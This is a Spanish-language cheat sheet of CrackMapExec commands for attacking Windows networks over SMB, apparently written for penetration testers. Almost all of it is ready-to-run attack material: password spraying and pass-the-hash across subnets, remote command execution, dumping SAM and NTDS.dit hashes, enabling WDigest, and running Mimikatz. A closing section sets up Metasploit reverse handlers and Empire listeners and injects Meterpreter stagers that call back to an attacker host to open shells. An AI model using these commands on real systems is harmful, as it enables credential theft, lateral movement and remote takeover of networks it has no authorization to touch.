CRACKMAPEXEC
Índice
Conexiones y Spraying
Ayuda General
crackmapexec --help
Ayuda de Protocolo
crackmapexec smb --help
Formato de Objetivo
crackmapexec smb ms.evilcorp.org
crackmapexec smb 192.168.1.0 192.168.0.2
crackmapexec smb 192.168.1.0-28 10.0.0.1-67
crackmapexec smb 192.168.1.0/24
crackmapexec smb targets.txt
Sesión Nula
crackmapexec smb 192.168.10.1 -u "" -p ""
Conectar al objetivo usando cuenta local
crackmapexec smb 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth
Pasar el hash contra una subred
crackmapexec smb 172.16.157.0/24 -u administrator -H 'LMHASH:NTHASH' --local-auth
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH'
Fuerza Bruta y Spraying de Contraseñas
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1"
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1" "password2"
crackmapexec smb 192.168.100.0/24 -u "admin1" "admin2" -p "P@ssword"
crackmapexec smb 192.168.100.0/24 -u user_file.txt -p pass_file.txt
crackmapexec smb 192.168.100.0/24 -u user_file.txt -H ntlm_hashFile.txt
Enumeración
Usuarios
Enumerar usuarios
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --users
Realizar RID Bruteforce para obtener usuarios
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --rid-brute
Enumerar grupos del dominio
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --groups
Enumerar usuarios locales
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-users
Hosts
Generar una lista de hosts relayables (SMB Signing deshabilitado)
crackmapexec smb 192.168.1.0/24 --gen-relay-list output.txt
Enumerar shares disponibles
crackmapexec smb 192.168.215.138 -u 'user' -p 'PASSWORD' --local-auth --shares
Obtener sesiones activas
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --sessions
Verificar usuarios logueados
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --lusers
Obtener la política de contraseñas
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --pass-pol
Ejecución y Otros
CrackMapExec tiene 3 métodos diferentes de ejecución de comandos (en orden predeterminado):
- wmiexec –> WMI
- atexec –> tarea programada
- smbexec –> crear y ejecutar un servicio
Ejecutar comando a través de cmd.exe (se requieren privilegios de administrador)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami'
Forzar el método smbexec
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
Ejecutar comandos a través de PowerShell (se requieren privilegios de administrador)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
Obtención de Credenciales
Volcar hashes locales de SAM
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
Habilitar o deshabilitar WDigest para obtener credenciales de la memoria LSA
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest disable
Forzar cierre de sesión
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'quser'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'logoff '
Volcar el NTDS.dit del DC utilizando métodos de secretsdump.py
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
Usar el Servicio de Copia de Sombra de Volumen
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Volcar el historial de contraseñas del NTDS.dit
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
Uso de la Base de Datos
La base de datos almacena automáticamente todos los hosts alcanzados por CME y todas las credenciales con acceso de administrador
$ cmedb
Usando espacios de trabajo
cmedb> workspace create test
cmedb> workspace test
Acceder a una base de datos de protocolo y volver
cmedb (test)> proto smb
cmedb (test)> back
Listar hosts almacenados
cmedb> hosts
Ver información detallada de una máquina específica (incluyendo credenciales)
cmedb> hosts
Obtener credenciales almacenadas
cmedb> creds
Obtener acceso de credenciales para una cuenta específica
cmedb> creds
Usar credenciales de la base de datos
crackmapexec smb 192.168.100.1 -id
Módulos
Listar módulos disponibles
crackmapexec smb -L
Información del módulo
crackmapexec smb -M mimikatz --module-info
Ver opciones del módulo
crackmapexec smb -M mimikatz --options
Módulo Mimikatz
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz
crackmapexec smb 192.168.215.104 -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'
Otros módulos
[*] Get-ComputerDetails Enumerates sysinfo
[*] bloodhound Executes the BloodHound recon script on the target and retrieves the results to the attacker's machine
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_avproducts Gathers information on all endpoint protection solutions installed on the remote host(s) via WMI
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_keystrokes Logs keys pressed, time and the active window
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_netrdpsession Enumerates all active RDP sessions
[*] get_timedscreenshot Takes screenshots at a regular interval
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] invoke_sessiongopher Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
[*] invoke_vnc Injects a VNC client in memory
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mimikatz Dumps all logon credentials from memory
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] mimikittenz Executes Mimikittenz
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] netripper Captures credentials by using API hooking
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] rdp Enables/Disables RDP
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writable shares
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] test_connection Pings a host
[*] tokens Enumerates available tokens
[*] uac Checks UAC status
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
Obtención de Shells
Metasploit
Primero, configurar un HTTP Reverse Handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.10.3
msf exploit(handler) > set exitonsession false
msf exploit(handler) > exploit -j
Módulo Met_Inject
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M met_inject -o LHOST=YOURIP LPORT=4444
Empire
Iniciar API RESTful
empire --rest --user empireadmin --pass gH25Iv1K68@^
Configurar un listener HTTP en Empire
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list
Módulo Empire
crackmapexec smb 192.168.215.104 -u Administrator -p PASSWORD --local-auth -M empire_exec -o LISTENER=CMETest